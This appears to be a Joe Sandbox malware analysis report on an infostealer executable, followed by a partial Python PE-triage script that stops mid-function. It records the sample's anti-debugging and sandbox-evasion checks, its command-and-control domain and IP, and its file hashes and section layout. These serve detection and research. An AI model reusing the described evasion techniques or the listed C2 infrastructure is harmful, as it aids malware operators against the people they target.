Source: file.exe, 00000000.00000003.2629736059.00000000016FD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2630078979.000000000170C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2630026091.00000000016FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2606683274.00000000016CA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2073486658.00000000016A3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2629692014.00000000016F0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2632082566.000000000170D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_07230A43 Start: 07230A27 End: 07230A22 0_2_07230A43
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_07290486 Start: 07290582 End: 07290588 0_2_07290486
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00719980 rdtsc 0_2_00719980
Source: file.exe, file.exe, 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Program Manager
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: file.exe, 00000000.00000003.2033116158.000000000749F000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: procmon.exe
Source: file.exe, 00000000.00000003.2033116158.000000000749F000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Source: Signature Results | Signatures: Mutex created, HTTP post and idle behavior
Source: global traffic | TCP traffic: 192.168.2.5:49705 -> 34.118.84.150:80
MITRE ATT&CK matrix. Columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact. The techniques with a signature count are listed per tactic below; the remaining cells of the matrix are the unmatched ATT&CK template.
Execution: Command and Scripting Interpreter (2)
Persistence: DLL Side-Loading (1)
Privilege Escalation: Process Injection (1), DLL Side-Loading (1)
Defense Evasion: Virtualization/Sandbox Evasion (24), Process Injection (1), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (3), Software Packing (12), DLL Side-Loading (1)
Discovery: Security Software Discovery (751), Virtualization/Sandbox Evasion (24), Process Discovery (13), Remote System Discovery (1), File and Directory Discovery (1), System Information Discovery (216)
Lateral Movement: Exploitation of Remote Services (1)
Collection: Archive Collected Data (11), Data from Local System (1)
Command and Control: Encrypted Channel (11), Ingress Tool Transfer (4), Non-Application Layer Protocol (4), Application Layer Protocol (5)
Reconnaissance, Resource Development, Initial Access, Credential Access, Exfiltration, Impact: no mapped signatures

Source | Detection | Scanner | Label
file.exe | 32% | ReversingLabs | Win32.Infostealer.Tinba
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML | -
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://home.twentykx20pt.top/AMeacCwtwXCqXfwTNSOI1732768477 | 0% | Avira URL Cloud | safe
http://home.twentykx20pt.top/AMeacCwtwXCqXfwTNSOI1732768477http://home.twentykx20pt.top/AMeacCwtwXCq | 0% | Avira URL Cloud | safe
http://home.twentykx20pt.top/AMeacCwtwXCqXfwTNSOI17327684775a1 | 0% | Avira URL Cloud | safe
http://home.twentykx20pt.top/AMeacCwtwXCqXfwTNSOI1732768477fd4 | 0% | Avira URL Cloud | safe
http://home.twentykx20pt.top/AMeacCwtwXCqXfwTNSOI1732768477?argument= | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
home.twentykx20pt.top | 34.118.84.150 | true | true | - | unknown
httpbin.org | 18.213.123.165 | true | false | - | high
Name | Malicious | Antivirus Detection | Reputation
http://home.twentykx20pt.top/AMeacCwtwXCqXfwTNSOI1732768477 | true | Avira URL Cloud: safe | unknown
https://httpbin.org/ip | false | - | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://curl.se/docs/hsts.html | file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp | false | - | high
http://html4/loose.dtd | file.exe, 00000000.00000003.2033116158.000000000749F000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp | false | - | high
https://curl.se/docs/alt-svc.html# | file.exe | false | - | high
http://home.twentykx20pt.top/AMeacCwtwXCqXfwTNSOI1732768477?argument= | file.exe, 00000000.00000003.2630054574.00000000016A4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2629897019.00000000016A3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2631723255.00000000016A5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://httpbin.org/ipbefore | file.exe, 00000000.00000003.2033116158.000000000749F000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp | false | - | high
https://curl.se/docs/http-cookies.html | file.exe, file.exe, 00000000.00000003.2033116158.000000000749F000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp | false | - | high
http://home.twentykx20pt.top/AMeacCwtwXCqXfwTNSOI1732768477fd4 | file.exe, 00000000.00000002.2631723255.000000000166E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://curl.se/docs/hsts.html# | file.exe | false | - | high
https://curl.se/docs/http-cookies.html# | file.exe | false | - | high
https://curl.se/docs/alt-svc.html | file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp | false | - | high
http://.css | file.exe, 00000000.00000003.2033116158.000000000749F000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp | false | - | high
http://home.twentykx20pt.top/AMeacCwtwXCqXfwTNSOI17327684775a1 | file.exe, 00000000.00000002.2631723255.000000000166E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://.jpg | file.exe, 00000000.00000003.2033116158.000000000749F000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp | false | - | high
http://home.twentykx20pt.top/AMeacCwtwXCqXfwTNSOI1732768477http://home.twentykx20pt.top/AMeacCwtwXCq | file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
18.213.123.165 | httpbin.org | United States | 14618 | AMAZON-AESUS | false
34.118.84.150 | home.twentykx20pt.top | United States | 139070 | GOOGLE-AS-APGoogleAsiaPacificPteLtdSG | true
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1564519
                            Start date and time:2024-11-28 13:08:07 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 5m 40s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:4
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:file.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@1/0@6/2
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:Failed
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            • VT rate limit hit for: file.exe
Time | Type | Description
07:09:27 | API Interceptor | 431x Sleep call for process: file.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
18.213.123.165
  file.exe | malicious | Clipboard Hijacker, Cryptbot
  file.exe | malicious | Clipboard Hijacker, Cryptbot
  file.exe | malicious | Clipboard Hijacker, Cryptbot
  file.exe | malicious | Clipboard Hijacker, Cryptbot
  file.exe | malicious | Amadey, Nymaim, Stealc, Vidar
  file.exe | malicious | Clipboard Hijacker, Cryptbot
  file.exe | malicious | Clipboard Hijacker, Cryptbot
  file.exe | malicious | PureCrypter, Amadey, LummaC Stealer, Stealc, Vidar
  file.exe | malicious | Clipboard Hijacker, Cryptbot
  file.exe | malicious | Amadey, Nymaim, Stealc, Vidar
34.118.84.150
  file.exe | malicious | Clipboard Hijacker, Cryptbot | home.twentykm20sr.top/iYUeIWtRvzKHTkiRYPPG1732630737
  file.exe | malicious | Clipboard Hijacker, Cryptbot | home.twentykm20sr.top/iYUeIWtRvzKHTkiRYPPG1732630737
  file.exe | malicious | Clipboard Hijacker, Cryptbot | home.twentykm20sr.top/iYUeIWtRvzKHTkiRYPPG1732630737
  file.exe | malicious | Clipboard Hijacker, Cryptbot | home.twentykm20sr.top/iYUeIWtRvzKHTkiRYPPG1732630737
  file.exe | malicious | Cryptbot | twentykm20sr.top/v1/upload.php
  file.exe | malicious | Clipboard Hijacker, Cryptbot | home.twentykm20sr.top/iYUeIWtRvzKHTkiRYPPG1732630737
  file.exe | malicious | Clipboard Hijacker, Cryptbot | home.twentykm20sr.top/iYUeIWtRvzKHTkiRYPPG1732630737
  file.exe | malicious | Amadey, Stealc, Vidar | home.twentykm20sr.top/iYUeIWtRvzKHTkiRYPPG1732630737
  file.exe | malicious | Amadey, Nymaim, Stealc, Vidar | home.twentykm20sr.top/iYUeIWtRvzKHTkiRYPPG1732630737?argument=3SvRMencu61cyg6M1732734428
  file.exe | malicious | Clipboard Hijacker, Cryptbot | home.twentykm20sr.top/iYUeIWtRvzKHTkiRYPPG1732630737?argument=bFHSCzLyg7vU1u9w1732732876
Match | Associated Sample Name / URL | Detection | Threat Name | Context
httpbin.org
  file.exe | malicious | Clipboard Hijacker, Cryptbot | 18.213.123.165
  file.exe | malicious | Amadey, Stealc, Vidar | 18.213.123.165
  file.exe | malicious | Clipboard Hijacker, Cryptbot | 18.208.8.205
  file.exe | malicious | Clipboard Hijacker, Cryptbot | 18.208.8.205
  file.exe | malicious | Clipboard Hijacker, Cryptbot | 18.213.123.165
  file.exe | malicious | Cryptbot | 18.208.8.205
  file.exe | malicious | Clipboard Hijacker, Cryptbot | 18.213.123.165
  file.exe | malicious | Clipboard Hijacker, Cryptbot | 18.213.123.165
  file.exe | malicious | Amadey, Stealc, Vidar | 18.208.8.205
  file.exe | malicious | Amadey, Nymaim, Stealc, Vidar | 18.213.123.165
Match | Associated Sample Name / URL | Detection | Threat Name | Context
GOOGLE-AS-APGoogleAsiaPacificPteLtdSG
  file.exe | malicious | Clipboard Hijacker, Cryptbot | 34.118.84.150
  https://u48396839.ct.sendgrid.net/ls/click?upn=u001.6YeAQ6CJdNBv-2FudCmnBUfnGDeiTDEbkJBDYPt6L9zLs-2FLsak6B-2FHJOeuaA20CRyj4ymcnZhEANFrmmsKVXf7lykKGGim9NKe15FTuMOZuNBEFww2OP8BGALV3hzGu43iFj3whu7ElN-2FNYQWfEnFZNtXik-2Bc8xYTdlDDi-2B43g3xWfoVMN9Dsem2IaNiiX-2B-2BZ0QUoG_EefQjaPBlm3j-2F4SdpslfvAk7fHMHOXJ7LweRGvhfSEmfDfe568-2FY-2BOLHESUZOtre1SJ0b0hpgZyE9nNkk5TdPOPC4tMbl8SiWrItsarfSJPs2UVOaCUP5NH54Bsd5iepHuriwvocK8ytgM3DUdP-2FGahP9TgWP8NK8XkzPu1yHstDO59EN9oezB0Bvcj4q1reEb5SVFPJB790ukEQpDzKhgmB7njVUkFC8cDwRBiYm4JeBTEVj-2FO9L-2B-2B-2FOmACAmxhX3ZwjKn-2F44onZNgScafSE7DBg-2BaKyUPEhIs0htUoWnblk2BMfXpJIrTjI4RRPPL3aYkpTlROjrttDT-2FsPXJXV6Ht5SRUu-2B0FMc-2F6UTXOUHRIAToTaXExoh-2BhOHngBDGdH-2FjIVKS7GHuJm-2FScM7fL8YyMYHIc3ZF3zj-2FrNo1yxz6qQNvNwYKE88E7ss0Of03GH-2FJ0B8fjyNmYGjPzU42L4WTkis-2FCNDcoVJ6gJCIZpmjB42-2FzDW6h-2FUREH0NUo2OPfZ9i8VYJz7QmCHLGmxdxD04Jz41PYtN7DaspcbsjIDanjiifLEQrLEWmHGBUFW4S8xlKCRj6eGsM5ZaDHWshSLBdAzDSyuonhuBxtuYLeNVHermIaoXD85egwdLJYANewTDecNDoTikVJ8mQdl7ZtnugAlt3ha0w0KmdiGihn6nvMrhhJrSgrE-2B65pLabznZrU0JRBQYA244iDFukcakZMIzjlzqr9piWLEWATx3NZaoZsiDxjNPIcS-2BPZq07eqXM1Ulzf-2FqkjGpcDoFG-2FrwE0q08CJl0HkI1XntIga1RDU5EZi756rrs6KbGhi0n0UYyAPMzcKJ1GSCyUZR-2FjEg-2FvBTzHO-2FOloWzctFMjjbt8OJhXkQtpwpSzQ5WMHPnqPpU8mVl6-2F8VDi2j4ulsfLIYkFMQxs-2FFnpoz7jaZyont10-3D | malicious | Unknown | 34.117.59.81
  file.exe | malicious | Credential Flusher | 34.117.188.166
  file.exe | malicious | Credential Flusher | 34.117.188.166
  file.exe | malicious | Clipboard Hijacker, Cryptbot | 34.118.84.150
  file.exe | malicious | Credential Flusher | 34.117.188.166
  file.exe | malicious | Credential Flusher | 34.117.188.166
  file.exe | malicious | Credential Flusher | 34.117.188.166
  file.exe | malicious | Credential Flusher | 34.117.188.166
  file.exe | malicious | Clipboard Hijacker, Cryptbot | 34.118.84.150
AMAZON-AESUS
  FACTURE NON PAYEE.pdf | malicious | Unknown | 50.16.47.176
  file.exe | malicious | Clipboard Hijacker, Cryptbot | 18.213.123.165
  invoice_96.73.exe | malicious | FormBook | 18.208.156.248
  https://u48396839.ct.sendgrid.net/ls/click?upn=u001.6YeAQ6CJdNBv-2FudCmnBUfnGDeiTDEbkJBDYPt6L9zLs-2FLsak6B-2FHJOeuaA20CRyj4ymcnZhEANFrmmsKVXf7lykKGGim9NKe15FTuMOZuNBEFww2OP8BGALV3hzGu43iFj3whu7ElN-2FNYQWfEnFZNtXik-2Bc8xYTdlDDi-2B43g3xWfoVMN9Dsem2IaNiiX-2B-2BZ0QUoG_EefQjaPBlm3j-2F4SdpslfvAk7fHMHOXJ7LweRGvhfSEmfDfe568-2FY-2BOLHESUZOtre1SJ0b0hpgZyE9nNkk5TdPOPC4tMbl8SiWrItsarfSJPs2UVOaCUP5NH54Bsd5iepHuriwvocK8ytgM3DUdP-2FGahP9TgWP8NK8XkzPu1yHstDO59EN9oezB0Bvcj4q1reEb5SVFPJB790ukEQpDzKhgmB7njVUkFC8cDwRBiYm4JeBTEVj-2FO9L-2B-2B-2FOmACAmxhX3ZwjKn-2F44onZNgScafSE7DBg-2BaKyUPEhIs0htUoWnblk2BMfXpJIrTjI4RRPPL3aYkpTlROjrttDT-2FsPXJXV6Ht5SRUu-2B0FMc-2F6UTXOUHRIAToTaXExoh-2BhOHngBDGdH-2FjIVKS7GHuJm-2FScM7fL8YyMYHIc3ZF3zj-2FrNo1yxz6qQNvNwYKE88E7ss0Of03GH-2FJ0B8fjyNmYGjPzU42L4WTkis-2FCNDcoVJ6gJCIZpmjB42-2FzDW6h-2FUREH0NUo2OPfZ9i8VYJz7QmCHLGmxdxD04Jz41PYtN7DaspcbsjIDanjiifLEQrLEWmHGBUFW4S8xlKCRj6eGsM5ZaDHWshSLBdAzDSyuonhuBxtuYLeNVHermIaoXD85egwdLJYANewTDecNDoTikVJ8mQdl7ZtnugAlt3ha0w0KmdiGihn6nvMrhhJrSgrE-2B65pLabznZrU0JRBQYA244iDFukcakZMIzjlzqr9piWLEWATx3NZaoZsiDxjNPIcS-2BPZq07eqXM1Ulzf-2FqkjGpcDoFG-2FrwE0q08CJl0HkI1XntIga1RDU5EZi756rrs6KbGhi0n0UYyAPMzcKJ1GSCyUZR-2FjEg-2FvBTzHO-2FOloWzctFMjjbt8OJhXkQtpwpSzQ5WMHPnqPpU8mVl6-2F8VDi2j4ulsfLIYkFMQxs-2FFnpoz7jaZyont10-3D | malicious | Unknown | 54.226.114.88
  botx.mpsl.elf | malicious | Mirai | 35.172.163.142
  sparc.nn.elf | malicious | Mirai, Okiru | 52.20.129.235
  https://important-wholesale-dress.glitch.me#clerk@tkbtc.co.uk | malicious | Unknown | 34.233.54.162
  file.exe | malicious | Clipboard Hijacker, Cryptbot | 18.208.8.205
  arm.nn.elf | malicious | Mirai, Okiru | 23.22.218.104
  arm5.nn.elf | malicious | Mirai, Okiru | 100.24.75.163
                                                No created / dropped files found
                                                File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                Entropy (8bit):7.984748897106969
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • VXD Driver (31/22) 0.00%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:file.exe
                                                File size:4'490'752 bytes
                                                MD5:2ba6fe9428da32103bb44c955939208d
                                                SHA1:145b071306f5ad32a9385ff9f89bae6a1ec968e9
                                                SHA256:1d64908fcbd9560615576da2b9b41ce76fafb939a0f04f559301a1946db4e936
                                                SHA512:044e8a36a5e03c9c406a4b3f2fdcd3057412875e1ebd4456aeb257bf622570826c665206d0ac5468ee6bf5b5642910a3c41a08cfdd7fc9c711561d31322854f0
                                                SSDEEP:98304:cu7lQqtvReOFQylDgN/8EZEKwfG4tp+WWU/rQh1D:cu795eygxefG42WWVh1
                                                TLSH:A12633EB6420FCA3F4E6F83038427EB5686956DA186F24D7710E65732B87C9243189FD
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...R.Gg...............(..H..Bm..2...@........H...@..........................p........D...@... ............................
                                                Icon Hash:00928e8e8686b000
                                                Entrypoint:0x1004000
                                                Entrypoint Section:.taggant
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                DLL Characteristics:DYNAMIC_BASE
                                                Time Stamp:0x6747F452 [Thu Nov 28 04:40:50 2024 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                Instruction
                                                jmp 00007F70F105CC3Ah
                                                pcmpgtb mm0, qword ptr [eax+eax+00h]
                                                add byte ptr [eax], al
                                                add cl, ch
                                                add byte ptr [eax], ah
                                                add byte ptr [eax], al
                                                add byte ptr [ebx], al
                                                or al, byte ptr [eax]
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], dh
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax+eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add ecx, dword ptr [edx]
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                or byte ptr [eax+00000000h], al
                                                add byte ptr [eax], al
                                                adc byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add ecx, dword ptr [edx]
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6ab05f | 0x73 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6aa000 | 0x2b0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc02d28 | 0x10 | dkqxmldn
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xc02cd8 | 0x18 | dkqxmldn
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(blank) | 0x1000 | 0x6a9000 | 0x283a00 | 0d023b49ee735932e1647b7f4ec9dde8 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x6aa000 | 0x2b0 | 0x200 | 5dc969c906bebf1c1c14e8ec4d27834d | False | 0.80078125 | data | 6.0329086636308356 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x6ab000 | 0x1000 | 0x200 | f31454e455ed73deb27ce21410c73ef5 | False | 0.166015625 | data | 1.1763897754724144 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(blank) | 0x6ac000 | 0x396000 | 0x200 | 702b0bf8fe04520c0774bc2ebc3df075 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
dkqxmldn | 0xa42000 | 0x1c1000 | 0x1c1000 | 5a7fd3200635cf16538ad1a487d3e733 | False | 0.9945288575306236 | data | 7.95546200906979 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
ajwrokqy | 0xc03000 | 0x1000 | 0x400 | ac34852ebceddb383f05938df2ffa1f8 | False | 0.7587890625 | data | 6.042933344826828 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0xc04000 | 0x3000 | 0x2200 | c915f6ee84120fda09cca0d89ab31a2e | False | 0.06008731617647059 | DOS executable (COM) | 0.7258707509838483 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0xc02d38 | 0x256 | ASCII text, with CRLF line terminators | | | 0.5100334448160535
DLL | Import
kernel32.dll | lstrcpy
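The section table above is what the static signatures in this report are reacting to: two sections with blank names, two with random eight-letter names, every executable section mapped read, write and execute at once, the dkqxmldn block at entropy 7.96 (a compressed or encrypted payload), an entry point that sits in .taggant rather than in .text, and a single lstrcpy import. The script below is an added example written for this page; it is not part of the Joe Sandbox report or of any tool it uses. It parses a PE32 section table with only the Python standard library and flags those same indicators. It runs on a constructed image from build_sample() whose layout copies the table above (the real sample is not embedded); the finding codes, STANDARD_SECTION_NAMES and NAME_CHARS are this example's own choices, not Joe Sandbox's.

```python
"""Added example: static PE32 section-table triage with the standard library."""
import math
import struct

STANDARD_SECTION_NAMES = {".text", ".data", ".rdata", ".idata", ".edata",
                          ".rsrc", ".reloc", ".bss", ".tls", ".pdata", ".CRT"}
NAME_CHARS = set("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789._$")
SCN_CNT_INITIALIZED_DATA = 0x00000040
SCN_MEM_EXECUTE, SCN_MEM_READ, SCN_MEM_WRITE = 0x20000000, 0x40000000, 0x80000000


def entropy(buf: bytes) -> float:
    """Shannon entropy in bits per byte; 8.0 means every byte value is equally likely."""
    if not buf:
        return 0.0
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def pe_checksum(data: bytes, checksum_off: int) -> int:
    """Optional-header CheckSum as imagehlp computes it: 32-bit word sum with
    carry folding, the CheckSum field itself skipped, file length added at the end."""
    padded = data + bytes(-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == checksum_off:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        if total > 0xFFFFFFFF:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
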